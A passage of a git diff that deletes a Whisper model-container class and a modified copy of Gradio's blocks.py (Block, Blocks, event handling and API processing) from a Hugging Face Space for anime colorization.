"float16", - download_root: str = None, - cache: ModelCache = None, models: List[ModelConfig] = []): - self.model_name = model_name - self.device = device - self.compute_type = compute_type - self.download_root = download_root - self.cache = cache - - # Will be created on demand - self.model = None - - # List of known models - self.models = models - - def get_model(self): - if self.model is None: - - if (self.cache is None): - self.model = self._create_model() - else: - model_key = "WhisperContainer." + self.model_name + ":" + (self.device if self.device else '') - self.model = self.cache.get(model_key, self._create_model) - return self.model - - @abc.abstractmethod - def _create_model(self): - raise NotImplementedError() - - def ensure_downloaded(self): - pass - - @abc.abstractmethod - def create_callback(self, language: str = None, task: str = None, initial_prompt: str = None, - initial_prompt_mode: VadInitialPromptMode = VadInitialPromptMode.PREPREND_FIRST_SEGMENT, - **decodeOptions: dict) -> AbstractWhisperCallback: - """ - Create a WhisperCallback object that can be used to transcript audio files. - - Parameters - ---------- - language: str - The target language of the transcription. If not specified, the language will be inferred from the audio content. - task: str - The task - either translate or transcribe. - initial_prompt: str - The initial prompt to use for the transcription. - initial_prompt_mode: VadInitialPromptMode - The mode to use for the initial prompt. If set to PREPEND_FIRST_SEGMENT, the initial prompt will be prepended to the first segment of audio. - If set to PREPEND_ALL_SEGMENTS, the initial prompt will be prepended to all segments of audio. - decodeOptions: dict - Additional options to pass to the decoder. Must be pickleable. - - Returns - ------- - A WhisperCallback object. - """ - raise NotImplementedError() - - # This is required for multiprocessing - def __getstate__(self): - return { - "model_name": self.model_name, - "device": self.device, - "download_root": self.download_root, - "models": self.models, - "compute_type": self.compute_type - } - - def __setstate__(self, state): - self.model_name = state["model_name"] - self.device = state["device"] - self.download_root = state["download_root"] - self.models = state["models"] - self.compute_type = state["compute_type"] - self.model = None - # Depickled objects must use the global cache - self.cache = GLOBAL_MODEL_CACHE \ No newline at end of file diff --git a/spaces/HighCWu/anime-colorization-with-hint/gradio-modified/gradio/blocks.py b/spaces/HighCWu/anime-colorization-with-hint/gradio-modified/gradio/blocks.py deleted file mode 100644 index dad4090c747cba3d38689642f4b5f17f5a004a58..0000000000000000000000000000000000000000 --- a/spaces/HighCWu/anime-colorization-with-hint/gradio-modified/gradio/blocks.py +++ /dev/null @@ -1,1673 +0,0 @@ -from __future__ import annotations - -import copy -import getpass -import inspect -import json -import os -import pkgutil -import random -import sys -import time -import warnings -import webbrowser -from abc import abstractmethod -from pathlib import Path -from types import ModuleType -from typing import TYPE_CHECKING, Any, Callable, Dict, Iterator, List, Set, Tuple, Type - -import anyio -import requests -from anyio import CapacityLimiter -from typing_extensions import Literal - -from gradio import ( - components, - encryptor, - external, - networking, - queueing, - routes, - strings, - utils, -) -from gradio.context import Context -from gradio.deprecation import check_deprecated_parameters -from gradio.documentation import document, set_documentation_group -from gradio.exceptions import DuplicateBlockError, InvalidApiName -from gradio.helpers import create_tracker, skip, special_args -from gradio.tunneling import CURRENT_TUNNELS -from gradio.utils import ( - TupleNoPrint, - check_function_inputs_match, - component_or_layout_class, - delete_none, - get_cancel_function, - get_continuous_fn, -) - -set_documentation_group("blocks") - - -if TYPE_CHECKING: # Only import for type checking (is False at runtime). - import comet_ml - from fastapi.applications import FastAPI - - from gradio.components import Component - - -class Block: - def __init__( - self, - *, - render: bool = True, - elem_id: str | None = None, - visible: bool = True, - root_url: str | None = None, # URL that is prepended to all file paths - _skip_init_processing: bool = False, # Used for loading from Spaces - **kwargs, - ): - self._id = Context.id - Context.id += 1 - self.visible = visible - self.elem_id = elem_id - self.root_url = root_url - self._skip_init_processing = _skip_init_processing - self._style = {} - self.parent: BlockContext | None = None - - if render: - self.render() - check_deprecated_parameters(self.__class__.__name__, **kwargs) - - def render(self): - """ - Adds self into appropriate BlockContext - """ - if Context.root_block is not None and self._id in Context.root_block.blocks: - raise DuplicateBlockError( - f"A block with id: {self._id} has already been rendered in the current Blocks." - ) - if Context.block is not None: - Context.block.add(self) - if Context.root_block is not None: - Context.root_block.blocks[self._id] = self - if isinstance(self, components.TempFileManager): - Context.root_block.temp_file_sets.append(self.temp_files) - return self - - def unrender(self): - """ - Removes self from BlockContext if it has been rendered (otherwise does nothing). - Removes self from the layout and collection of blocks, but does not delete any event triggers. - """ - if Context.block is not None: - try: - Context.block.children.remove(self) - except ValueError: - pass - if Context.root_block is not None: - try: - del Context.root_block.blocks[self._id] - except KeyError: - pass - return self - - def get_block_name(self) -> str: - """ - Gets block's class name. - - If it is template component it gets the parent's class name. - - @return: class name - """ - return ( - self.__class__.__base__.__name__.lower() - if hasattr(self, "is_template") - else self.__class__.__name__.lower() - ) - - def get_expected_parent(self) -> Type[BlockContext] | None: - return None - - def set_event_trigger( - self, - event_name: str, - fn: Callable | None, - inputs: Component | List[Component] | Set[Component] | None, - outputs: Component | List[Component] | None, - preprocess: bool = True, - postprocess: bool = True, - scroll_to_output: bool = False, - show_progress: bool = True, - api_name: str | None = None, - js: str | None = None, - no_target: bool = False, - queue: bool | None = None, - batch: bool = False, - max_batch_size: int = 4, - cancels: List[int] | None = None, - every: float | None = None, - ) -> Dict[str, Any]: - """ - Adds an event to the component's dependencies. - Parameters: - event_name: event name - fn: Callable function - inputs: input list - outputs: output list - preprocess: whether to run the preprocess methods of components - postprocess: whether to run the postprocess methods of components - scroll_to_output: whether to scroll to output of dependency on trigger - show_progress: whether to show progress animation while running. - api_name: Defining this parameter exposes the endpoint in the api docs - js: Optional frontend js method to run before running 'fn'. Input arguments for js method are values of 'inputs' and 'outputs', return should be a list of values for output components - no_target: if True, sets "targets" to [], used for Blocks "load" event - batch: whether this function takes in a batch of inputs - max_batch_size: the maximum batch size to send to the function - cancels: a list of other events to cancel when this event is triggered. For example, setting cancels=[click_event] will cancel the click_event, where click_event is the return value of another components .click method. - Returns: None - """ - # Support for singular parameter - if isinstance(inputs, set): - inputs_as_dict = True - inputs = sorted(inputs, key=lambda x: x._id) - else: - inputs_as_dict = False - if inputs is None: - inputs = [] - elif not isinstance(inputs, list): - inputs = [inputs] - - if isinstance(outputs, set): - outputs = sorted(outputs, key=lambda x: x._id) - else: - if outputs is None: - outputs = [] - elif not isinstance(outputs, list): - outputs = [outputs] - - if fn is not None and not cancels: - check_function_inputs_match(fn, inputs, inputs_as_dict) - - if Context.root_block is None: - raise AttributeError( - f"{event_name}() and other events can only be called within a Blocks context." - ) - if every is not None and every <= 0: - raise ValueError("Parameter every must be positive or None") - if every and batch: - raise ValueError( - f"Cannot run {event_name} event in a batch and every {every} seconds. " - "Either batch is True or every is non-zero but not both." - ) - - if every and fn: - fn = get_continuous_fn(fn, every) - elif every: - raise ValueError("Cannot set a value for `every` without a `fn`.") - - Context.root_block.fns.append( - BlockFunction(fn, inputs, outputs, preprocess, postprocess, inputs_as_dict) - ) - if api_name is not None: - api_name_ = utils.append_unique_suffix( - api_name, [dep["api_name"] for dep in Context.root_block.dependencies] - ) - if not (api_name == api_name_): - warnings.warn( - "api_name {} already exists, using {}".format(api_name, api_name_) - ) - api_name = api_name_ - - dependency = { - "targets": [self._id] if not no_target else [], - "trigger": event_name, - "inputs": [block._id for block in inputs], - "outputs": [block._id for block in outputs], - "backend_fn": fn is not None, - "js": js, - "queue": False if fn is None else queue, - "api_name": api_name, - "scroll_to_output": scroll_to_output, - "show_progress": show_progress, - "every": every, - "batch": batch, - "max_batch_size": max_batch_size, - "cancels": cancels or [], - } - Context.root_block.dependencies.append(dependency) - return dependency - - def get_config(self): - return { - "visible": self.visible, - "elem_id": self.elem_id, - "style": self._style, - "root_url": self.root_url, - } - - @staticmethod - @abstractmethod - def update(**kwargs) -> Dict: - return {} - - @classmethod - def get_specific_update(cls, generic_update: Dict[str, Any]) -> Dict: - del generic_update["__type__"] - specific_update = cls.update(**generic_update) - return specific_update - - -class BlockContext(Block): - def __init__( - self, - visible: bool = True, - render: bool = True, - **kwargs, - ): - """ - Parameters: - visible: If False, this will be hidden but included in the Blocks config file (its visibility can later be updated). - render: If False, this will not be included in the Blocks config file at all. - """ - self.children: List[Block] = [] - super().__init__(visible=visible, render=render, **kwargs) - - def __enter__(self): - self.parent = Context.block - Context.block = self - return self - - def add(self, child: Block): - child.parent = self - self.children.append(child) - - def fill_expected_parents(self): - children = [] - pseudo_parent = None - for child in self.children: - expected_parent = child.get_expected_parent() - if not expected_parent or isinstance(self, expected_parent): - pseudo_parent = None - children.append(child) - else: - if pseudo_parent is not None and isinstance( - pseudo_parent, expected_parent - ): - pseudo_parent.children.append(child) - else: - pseudo_parent = expected_parent(render=False) - children.append(pseudo_parent) - pseudo_parent.children = [child] - if Context.root_block: - Context.root_block.blocks[pseudo_parent._id] = pseudo_parent - child.parent = pseudo_parent - self.children = children - - def __exit__(self, *args): - if getattr(self, "allow_expected_parents", True): - self.fill_expected_parents() - Context.block = self.parent - - def postprocess(self, y): - """ - Any postprocessing needed to be performed on a block context. - """ - return y - - -class BlockFunction: - def __init__( - self, - fn: Callable | None, - inputs: List[Component], - outputs: List[Component], - preprocess: bool, - postprocess: bool, - inputs_as_dict: bool, - ): - self.fn = fn - self.inputs = inputs - self.outputs = outputs - self.preprocess = preprocess - self.postprocess = postprocess - self.total_runtime = 0 - self.total_runs = 0 - self.inputs_as_dict = inputs_as_dict - - def __str__(self): - return str( - { - "fn": getattr(self.fn, "__name__", "fn") - if self.fn is not None - else None, - "preprocess": self.preprocess, - "postprocess": self.postprocess, - } - ) - - def __repr__(self): - return str(self) - - -class class_or_instancemethod(classmethod): - def __get__(self, instance, type_): - descr_get = super().__get__ if instance is None else self.__func__.__get__ - return descr_get(instance, type_) - - -def postprocess_update_dict(block: Block, update_dict: Dict, postprocess: bool = True): - """ - Converts a dictionary of updates into a format that can be sent to the frontend. - E.g. {"__type__": "generic_update", "value": "2", "interactive": False} - Into -> {"__type__": "update", "value": 2.0, "mode": "static"} - - Parameters: - block: The Block that is being updated with this update dictionary. - update_dict: The original update dictionary - postprocess: Whether to postprocess the "value" key of the update dictionary. - """ - if update_dict.get("__type__", "") == "generic_update": - update_dict = block.get_specific_update(update_dict) - if update_dict.get("value") is components._Keywords.NO_VALUE: - update_dict.pop("value") - prediction_value = delete_none(update_dict, skip_value=True) - if "value" in prediction_value and postprocess: - assert isinstance( - block, components.IOComponent - ), f"Component {block.__class__} does not support value" - prediction_value["value"] = block.postprocess(prediction_value["value"]) - return prediction_value - - -def convert_component_dict_to_list( - outputs_ids: List[int], predictions: Dict -) -> List | Dict: - """ - Converts a dictionary of component updates into a list of updates in the order of - the outputs_ids and including every output component. Leaves other types of dictionaries unchanged. - E.g. {"textbox": "hello", "number": {"__type__": "generic_update", "value": "2"}} - Into -> ["hello", {"__type__": "generic_update"}, {"__type__": "generic_update", "value": "2"}] - """ - keys_are_blocks = [isinstance(key, Block) for key in predictions.keys()] - if all(keys_are_blocks): - reordered_predictions = [skip() for _ in outputs_ids] - for component, value in predictions.items(): - if component._id not in outputs_ids: - raise ValueError( - f"Returned component {component} not specified as output of function." - ) - output_index = outputs_ids.index(component._id) - reordered_predictions[output_index] = value - predictions = utils.resolve_singleton(reordered_predictions) - elif any(keys_are_blocks): - raise ValueError( - "Returned dictionary included some keys as Components. Either all keys must be Components to assign Component values, or return a List of values to assign output values in order." - ) - return predictions - - -@document("load") -class Blocks(BlockContext): - """ - Blocks is Gradio's low-level API that allows you to create more custom web - applications and demos than Interfaces (yet still entirely in Python). - - - Compared to the Interface class, Blocks offers more flexibility and control over: - (1) the layout of components (2) the events that - trigger the execution of functions (3) data flows (e.g. inputs can trigger outputs, - which can trigger the next level of outputs). Blocks also offers ways to group - together related demos such as with tabs. - - - The basic usage of Blocks is as follows: create a Blocks object, then use it as a - context (with the "with" statement), and then define layouts, components, or events - within the Blocks context. Finally, call the launch() method to launch the demo. - - Example: - import gradio as gr - def update(name): - return f"Welcome to Gradio, {name}!" - - with gr.Blocks() as demo: - gr.Markdown("Start typing below and then click **Run** to see the output.") - with gr.Row(): - inp = gr.Textbox(placeholder="What is your name?") - out = gr.Textbox() - btn = gr.Button("Run") - btn.click(fn=update, inputs=inp, outputs=out) - - demo.launch() - Demos: blocks_hello, blocks_flipper, blocks_speech_text_sentiment, generate_english_german, sound_alert - Guides: blocks_and_event_listeners, controlling_layout, state_in_blocks, custom_CSS_and_JS, custom_interpretations_with_blocks, using_blocks_like_functions - """ - - def __init__( - self, - theme: str = "default", - analytics_enabled: bool | None = None, - mode: str = "blocks", - title: str = "Gradio", - css: str | None = None, - **kwargs, - ): - """ - Parameters: - theme: which theme to use - right now, only "default" is supported. - analytics_enabled: whether to allow basic telemetry. If None, will use GRADIO_ANALYTICS_ENABLED environment variable or default to True. - mode: a human-friendly name for the kind of Blocks or Interface being created. - title: The tab title to display when this is opened in a browser window. - css: custom css or path to custom css file to apply to entire Blocks - """ - # Cleanup shared parameters with Interface #TODO: is this part still necessary after Interface with Blocks? - self.limiter = None - self.save_to = None - self.theme = theme - self.encrypt = False - self.share = False - self.enable_queue = None - self.max_threads = 40 - self.show_error = True - if css is not None and Path(css).exists(): - with open(css) as css_file: - self.css = css_file.read() - else: - self.css = css - - # For analytics_enabled and allow_flagging: (1) first check for - # parameter, (2) check for env variable, (3) default to True/"manual" - self.analytics_enabled = ( - analytics_enabled - if analytics_enabled is not None - else os.getenv("GRADIO_ANALYTICS_ENABLED", "True") == "True" - ) - - super().__init__(render=False, **kwargs) - self.blocks: Dict[int, Block] = {} - self.fns: List[BlockFunction] = [] - self.dependencies = [] - self.mode = mode - - self.is_running = False - self.local_url = None - self.share_url = None - self.width = None - self.height = None - self.api_open = True - - self.ip_address = "" - self.is_space = True if os.getenv("SYSTEM") == "spaces" else False - self.favicon_path = None - self.auth = None - self.dev_mode = True - self.app_id = random.getrandbits(64) - self.temp_file_sets = [] - self.title = title - self.show_api = True - - # Only used when an Interface is loaded from a config - self.predict = None - self.input_components = None - self.output_components = None - self.__name__ = None - self.api_mode = None - - if self.analytics_enabled: - self.ip_address = utils.get_local_ip_address() - data = { - "mode": self.mode, - "ip_address": self.ip_address, - "custom_css": self.css is not None, - "theme": self.theme, - "version": (pkgutil.get_data(__name__, "version.txt") or b"") - .decode("ascii") - .strip(), - } - utils.initiated_analytics(data) - - @classmethod - def from_config( - cls, config: dict, fns: List[Callable], root_url: str | None = None - ) -> Blocks: - """ - Factory method that creates a Blocks from a config and list of functions. - - Parameters: - config: a dictionary containing the configuration of the Blocks. - fns: a list of functions that are used in the Blocks. Must be in the same order as the dependencies in the config. - root_url: an optional root url to use for the components in the Blocks. Allows serving files from an external URL. - """ - config = copy.deepcopy(config) - components_config = config["components"] - original_mapping: Dict[int, Block] = {} - - def get_block_instance(id: int) -> Block: - for block_config in components_config: - if block_config["id"] == id: - break - else: - raise ValueError("Cannot find block with id {}".format(id)) - cls = component_or_layout_class(block_config["type"]) - block_config["props"].pop("type", None) - block_config["props"].pop("name", None) - style = block_config["props"].pop("style", None) - if block_config["props"].get("root_url") is None and root_url: - block_config["props"]["root_url"] = root_url + "/" - # Any component has already processed its initial value, so we skip that step here - block = cls(**block_config["props"], _skip_init_processing=True) - if style and isinstance(block, components.IOComponent): - block.style(**style) - return block - - def iterate_over_children(children_list): - for child_config in children_list: - id = child_config["id"] - block = get_block_instance(id) - - original_mapping[id] = block - - children = child_config.get("children") - if children is not None: - assert isinstance( - block, BlockContext - ), f"Invalid config, Block with id {id} has children but is not a BlockContext." - with block: - iterate_over_children(children) - - with Blocks(theme=config["theme"], css=config["theme"]) as blocks: - # ID 0 should be the root Blocks component - original_mapping[0] = Context.root_block or blocks - - iterate_over_children(config["layout"]["children"]) - - first_dependency = None - - # add the event triggers - for dependency, fn in zip(config["dependencies"], fns): - # We used to add a "fake_event" to the config to cache examples - # without removing it. This was causing bugs in calling gr.Interface.load - # We fixed the issue by removing "fake_event" from the config in examples.py - # but we still need to skip these events when loading the config to support - # older demos - if dependency["trigger"] == "fake_event": - continue - targets = dependency.pop("targets") - trigger = dependency.pop("trigger") - dependency.pop("backend_fn") - dependency.pop("documentation", None) - dependency["inputs"] = [ - original_mapping[i] for i in dependency["inputs"] - ] - dependency["outputs"] = [ - original_mapping[o] for o in dependency["outputs"] - ] - dependency.pop("status_tracker", None) - dependency["preprocess"] = False - dependency["postprocess"] = False - - for target in targets: - dependency = original_mapping[target].set_event_trigger( - event_name=trigger, fn=fn, **dependency - ) - if first_dependency is None: - first_dependency = dependency - - # Allows some use of Interface-specific methods with loaded Spaces - if first_dependency and Context.root_block: - blocks.predict = [fns[0]] - blocks.input_components = [ - Context.root_block.blocks[i] for i in first_dependency["inputs"] - ] - blocks.output_components = [ - Context.root_block.blocks[o] for o in first_dependency["outputs"] - ] - blocks.__name__ = "Interface" - blocks.api_mode = True - - return blocks - - def __str__(self): - return self.__repr__() - - def __repr__(self): - num_backend_fns = len([d for d in self.dependencies if d["backend_fn"]]) - repr = f"Gradio Blocks instance: {num_backend_fns} backend functions" - repr += "\n" + "-" * len(repr) - for d, dependency in enumerate(self.dependencies): - if dependency["backend_fn"]: - repr += f"\nfn_index={d}" - repr += "\n inputs:" - for input_id in dependency["inputs"]: - block = self.blocks[input_id] - repr += "\n |-{}".format(str(block)) - repr += "\n outputs:" - for output_id in dependency["outputs"]: - block = self.blocks[output_id] - repr += "\n |-{}".format(str(block)) - return repr - - def render(self): - if Context.root_block is not None: - if self._id in Context.root_block.blocks: - raise DuplicateBlockError( - f"A block with id: {self._id} has already been rendered in the current Blocks." - ) - if not set(Context.root_block.blocks).isdisjoint(self.blocks): - raise DuplicateBlockError( - "At least one block in this Blocks has already been rendered." - ) - - Context.root_block.blocks.update(self.blocks) - Context.root_block.fns.extend(self.fns) - dependency_offset = len(Context.root_block.dependencies) - for i, dependency in enumerate(self.dependencies): - api_name = dependency["api_name"] - if api_name is not None: - api_name_ = utils.append_unique_suffix( - api_name, - [dep["api_name"] for dep in Context.root_block.dependencies], - ) - if not (api_name == api_name_): - warnings.warn( - "api_name {} already exists, using {}".format( - api_name, api_name_ - ) - ) - dependency["api_name"] = api_name_ - dependency["cancels"] = [ - c + dependency_offset for c in dependency["cancels"] - ] - # Recreate the cancel function so that it has the latest - # dependency fn indices. This is necessary to properly cancel - # events in the backend - if dependency["cancels"]: - updated_cancels = [ - Context.root_block.dependencies[i] - for i in dependency["cancels"] - ] - new_fn = BlockFunction( - get_cancel_function(updated_cancels)[0], - [], - [], - False, - True, - False, - ) - Context.root_block.fns[dependency_offset + i] = new_fn - Context.root_block.dependencies.append(dependency) - Context.root_block.temp_file_sets.extend(self.temp_file_sets) - - if Context.block is not None: - Context.block.children.extend(self.children) - return self - - def is_callable(self, fn_index: int = 0) -> bool: - """Checks if a particular Blocks function is callable (i.e. not stateful or a generator).""" - block_fn = self.fns[fn_index] - dependency = self.dependencies[fn_index] - - if inspect.isasyncgenfunction(block_fn.fn): - return False - if inspect.isgeneratorfunction(block_fn.fn): - return False - for input_id in dependency["inputs"]: - block = self.blocks[input_id] - if getattr(block, "stateful", False): - return False - for output_id in dependency["outputs"]: - block = self.blocks[output_id] - if getattr(block, "stateful", False): - return False - - return True - - def __call__(self, *inputs, fn_index: int = 0, api_name: str | None = None): - """ - Allows Blocks objects to be called as functions. Supply the parameters to the - function as positional arguments. To choose which function to call, use the - fn_index parameter, which must be a keyword argument. - - Parameters: - *inputs: the parameters to pass to the function - fn_index: the index of the function to call (defaults to 0, which for Interfaces, is the default prediction function) - api_name: The api_name of the dependency to call. Will take precedence over fn_index. - """ - if api_name is not None: - inferred_fn_index = next( - ( - i - for i, d in enumerate(self.dependencies) - if d.get("api_name") == api_name - ), - None, - ) - if inferred_fn_index is None: - raise InvalidApiName(f"Cannot find a function with api_name {api_name}") - fn_index = inferred_fn_index - if not (self.is_callable(fn_index)): - raise ValueError( - "This function is not callable because it is either stateful or is a generator. Please use the .launch() method instead to create an interactive user interface." - ) - - inputs = list(inputs) - processed_inputs = self.serialize_data(fn_index, inputs) - batch = self.dependencies[fn_index]["batch"] - if batch: - processed_inputs = [[inp] for inp in processed_inputs] - - outputs = utils.synchronize_async( - self.process_api, - fn_index=fn_index, - inputs=processed_inputs, - request=None, - state={}, - ) - outputs = outputs["data"] - - if batch: - outputs = [out[0] for out in outputs] - - processed_outputs = self.deserialize_data(fn_index, outputs) - processed_outputs = utils.resolve_singleton(processed_outputs) - - return processed_outputs - - async def call_function( - self, - fn_index: int, - processed_input: List[Any], - iterator: Iterator[Any] | None = None, - requests: routes.Request | List[routes.Request] | None = None, - event_id: str | None = None, - ): - """ - Calls function with given index and preprocessed input, and measures process time. - Parameters: - fn_index: index of function to call - processed_input: preprocessed input to pass to function - iterator: iterator to use if function is a generator - requests: requests to pass to function - event_id: id of event in queue - """ - block_fn = self.fns[fn_index] - assert block_fn.fn, f"function with index {fn_index} not defined." - is_generating = False - - if block_fn.inputs_as_dict: - processed_input = [ - { - input_component: data - for input_component, data in zip(block_fn.inputs, processed_input) - } - ] - - if isinstance(requests, list): - request = requests[0] - else: - request = requests - processed_input, progress_index = special_args( - block_fn.fn, - processed_input, - request, - ) - progress_tracker = ( - processed_input[progress_index] if progress_index is not None else None - ) - - start = time.time() - - if iterator is None: # If not a generator function that has already run - if progress_tracker is not None and progress_index is not None: - progress_tracker, fn = create_tracker( - self, event_id, block_fn.fn, progress_tracker.track_tqdm - ) - processed_input[progress_index] = progress_tracker - else: - fn = block_fn.fn - - if inspect.iscoroutinefunction(fn): - prediction = await fn(*processed_input) - else: - prediction = await anyio.to_thread.run_sync( - fn, *processed_input, limiter=self.limiter - ) - else: - prediction = None - - if inspect.isasyncgenfunction(block_fn.fn): - raise ValueError("Gradio does not support async generators.") - if inspect.isgeneratorfunction(block_fn.fn): - if not self.enable_queue: - raise ValueError("Need to enable queue to use generators.") - try: - if iterator is None: - iterator = prediction - prediction = await anyio.to_thread.run_sync( - utils.async_iteration, iterator, limiter=self.limiter - ) - is_generating = True - except StopAsyncIteration: - n_outputs = len(self.dependencies[fn_index].get("outputs")) - prediction = ( - components._Keywords.FINISHED_ITERATING - if n_outputs == 1 - else (components._Keywords.FINISHED_ITERATING,) * n_outputs - ) - iterator = None - - duration = time.time() - start - - return { - "prediction": prediction, - "duration": duration, - "is_generating": is_generating, - "iterator": iterator, - } - - def serialize_data(self, fn_index: int, inputs: List[Any]) -> List[Any]: - dependency = self.dependencies[fn_index] - processed_input = [] - - for i, input_id in enumerate(dependency["inputs"]): - block = self.blocks[input_id] - assert isinstance( - block, components.IOComponent - ), f"{block.__class__} Component with id {input_id} not a valid input component." - serialized_input = block.serialize(inputs[i]) - processed_input.append(serialized_input) - - return processed_input - - def deserialize_data(self, fn_index: int, outputs: List[Any]) -> List[Any]: - dependency = self.dependencies[fn_index] - predictions = [] - - for o, output_id in enumerate(dependency["outputs"]): - block = self.blocks[output_id] - assert isinstance( - block, components.IOComponent - ), f"{block.__class__} Component with id {output_id} not a valid output component." - deserialized = block.deserialize(outputs[o]) - predictions.append(deserialized) - - return predictions - - def preprocess_data(self, fn_index: int, inputs: List[Any], state: Dict[int, Any]): - block_fn = self.fns[fn_index] - dependency = self.dependencies[fn_index] - - if block_fn.preprocess: - processed_input = [] - for i, input_id in enumerate(dependency["inputs"]): - block = self.blocks[input_id] - assert isinstance( - block, components.Component - ), f"{block.__class__} Component with id {input_id} not a valid input component." - if getattr(block, "stateful", False): - processed_input.append(state.get(input_id)) - else: - processed_input.append(block.preprocess(inputs[i])) - else: - processed_input = inputs - return processed_input - - def postprocess_data( - self, fn_index: int, predictions: List | Dict, state: Dict[int, Any] - ): - block_fn = self.fns[fn_index] - dependency = self.dependencies[fn_index] - batch = dependency["batch"] - - if type(predictions) is dict and len(predictions) > 0: - predictions = convert_component_dict_to_list( - dependency["outputs"], predictions - ) - - if len(dependency["outputs"]) == 1 and not (batch): - predictions = [ - predictions, - ] - - output = [] - for i, output_id in enumerate(dependency["outputs"]): - if predictions[i] is components._Keywords.FINISHED_ITERATING: - output.append(None) - continue - block = self.blocks[output_id] - if getattr(block, "stateful", False): - if not utils.is_update(predictions[i]): - state[output_id] = predictions[i] - output.append(None) - else: - prediction_value = predictions[i] - if utils.is_update(prediction_value): - assert isinstance(prediction_value, dict) - prediction_value = postprocess_update_dict( - block=block, - update_dict=prediction_value, - postprocess=block_fn.postprocess, - ) - elif block_fn.postprocess: - assert isinstance( - block, components.Component - ), f"{block.__class__} Component with id {output_id} not a valid output component." - prediction_value = block.postprocess(prediction_value) - output.append(prediction_value) - return output - - async def process_api( - self, - fn_index: int, - inputs: List[Any], - state: Dict[int, Any], - request: routes.Request | List[routes.Request] | None = None, - iterators: Dict[int, Any] | None = None, - event_id: str | None = None, - ) -> Dict[str, Any]: - """ - Processes API calls from the frontend. First preprocesses the data, - then runs the relevant function, then postprocesses the output. - Parameters: - fn_index: Index of function to run. - inputs: input data received from the frontend - username: name of user if authentication is set up (not used) - state: data stored from stateful components for session (key is input block id) - iterators: the in-progress iterators for each generator function (key is function index) - Returns: None - """ - block_fn = self.fns[fn_index] - batch = self.dependencies[fn_index]["batch"] - - if batch: - max_batch_size = self.dependencies[fn_index]["max_batch_size"] - batch_sizes = [len(inp) for inp in inputs] - batch_size = batch_sizes[0] - if inspect.isasyncgenfunction(block_fn.fn) or inspect.isgeneratorfunction( - block_fn.fn - ): - raise ValueError("Gradio does not support generators in batch mode.") - if not all(x == batch_size for x in batch_sizes): - raise ValueError( - f"All inputs to a batch function must have the same length but instead have sizes: {batch_sizes}." - ) - if batch_size > max_batch_size: - raise ValueError( - f"Batch size ({batch_size}) exceeds the max_batch_size for this function ({max_batch_size})" - ) - - inputs = [ - self.preprocess_data(fn_index, list(i), state) for i in zip(*inputs) - ] - result = await self.call_function( - fn_index, list(zip(*inputs)), None, request - ) - preds = result["prediction"] - data = [ - self.postprocess_data(fn_index, list(o), state) for o in zip(*preds) - ] - data = list(zip(*data)) - is_generating, iterator = None, None - else: - inputs = self.preprocess_data(fn_index, inputs, state) - iterator = iterators.get(fn_index, None) if iterators else None - result = await self.call_function( - fn_index, inputs, iterator, request, event_id - ) - data = self.postprocess_data(fn_index, result["prediction"], state) - is_generating, iterator = result["is_generating"], result["iterator"] - - block_fn.total_runtime += result["duration"] - block_fn.total_runs += 1 - - return { - "data": data, - "is_generating": is_generating, - "iterator": iterator, - "duration": result["duration"], - "average_duration": block_fn.total_runtime / block_fn.total_runs, - } - - async def create_limiter(self): - self.limiter = ( - None - if self.max_threads == 40 - else CapacityLimiter(total_tokens=self.max_threads) - ) - - def get_config(self): - return {"type": "column"} - - def get_config_file(self): - config = { - "version": routes.VERSION, - "mode": self.mode, - "dev_mode": self.dev_mode, - "components": [], - "theme": self.theme, - "css": self.css, - "title": self.title or "Gradio", - "is_space": self.is_space, - "enable_queue": getattr(self, "enable_queue", False), # launch attributes - "show_error": getattr(self, "show_error", False), - "show_api": self.show_api, - "is_colab": utils.colab_check(), - } - - def getLayout(block): - if not isinstance(block, BlockContext): - return {"id": block._id} - children_layout = [] - for child in block.children: - children_layout.append(getLayout(child)) - return {"id": block._id, "children": children_layout} - - config["layout"] = getLayout(self) - - for _id, block in self.blocks.items(): - config["components"].append( - { - "id": _id, - "type": (block.get_block_name()), - "props": utils.delete_none(block.get_config()) - if hasattr(block, "get_config") - else {}, - } - ) - config["dependencies"] = self.dependencies - return config - - def __enter__(self): - if Context.block is None: - Context.root_block = self - self.parent = Context.block - Context.block = self - return self - - def __exit__(self, *args): - super().fill_expected_parents() - Context.block = self.parent - # Configure the load events before root_block is reset - self.attach_load_events() - if self.parent is None: - Context.root_block = None - else: - self.parent.children.extend(self.children) - self.config = self.get_config_file() - self.app = routes.App.create_app(self) - - @class_or_instancemethod - def load( - self_or_cls, - fn: Callable | None = None, - inputs: List[Component] | None = None, - outputs: List[Component] | None = None, - api_name: str | None = None, - scroll_to_output: bool = False, - show_progress: bool = True, - queue=None, - batch: bool = False, - max_batch_size: int = 4, - preprocess: bool = True, - postprocess: bool = True, - every: float | None = None, - _js: str | None = None, - *, - name: str | None = None, - src: str | None = None, - api_key: str | None = None, - alias: str | None = None, - **kwargs, - ) -> Blocks | Dict[str, Any] | None: - """ - For reverse compatibility reasons, this is both a class method and an instance - method, the two of which, confusingly, do two completely different things. - - - Class method: loads a demo from a Hugging Face Spaces repo and creates it locally and returns a block instance. Equivalent to gradio.Interface.load() - - - Instance method: adds event that runs as soon as the demo loads in the browser. Example usage below. - Parameters: - name: Class Method - the name of the model (e.g. "gpt2" or "facebook/bart-base") or space (e.g. "flax-community/spanish-gpt2"), can include the `src` as prefix (e.g. "models/facebook/bart-base") - src: Class Method - the source of the model: `models` or `spaces` (or leave empty if source is provided as a prefix in `name`) - api_key: Class Method - optional access token for loading private Hugging Face Hub models or spaces. Find your token here: https://huggingface.co/settings/tokens - alias: Class Method - optional string used as the name of the loaded model instead of the default name (only applies if loading a Space running Gradio 2.x) - fn: Instance Method - the function to wrap an interface around. Often a machine learning model's prediction function. Each parameter of the function corresponds to one input component, and the function should return a single value or a tuple of values, with each element in the tuple corresponding to one output component. - inputs: Instance Method - List of gradio.components to use as inputs. If the function takes no inputs, this should be an empty list. - outputs: Instance Method - List of gradio.components to use as inputs. If the function returns no outputs, this should be an empty list. - api_name: Instance Method - Defining this parameter exposes the endpoint in the api docs - scroll_to_output: Instance Method - If True, will scroll to output component on completion - show_progress: Instance Method - If True, will show progress animation while pending - queue: Instance Method - If True, will place the request on the queue, if the queue exists - batch: Instance Method - If True, then the function should process a batch of inputs, meaning that it should accept a list of input values for each parameter. The lists should be of equal length (and be up to length `max_batch_size`). The function is then *required* to return a tuple of lists (even if there is only 1 output component), with each list in the tuple corresponding to one output component. - max_batch_size: Instance Method - Maximum number of inputs to batch together if this is called from the queue (only relevant if batch=True) - preprocess: Instance Method - If False, will not run preprocessing of component data before running 'fn' (e.g. leaving it as a base64 string if this method is called with the `Image` component). - 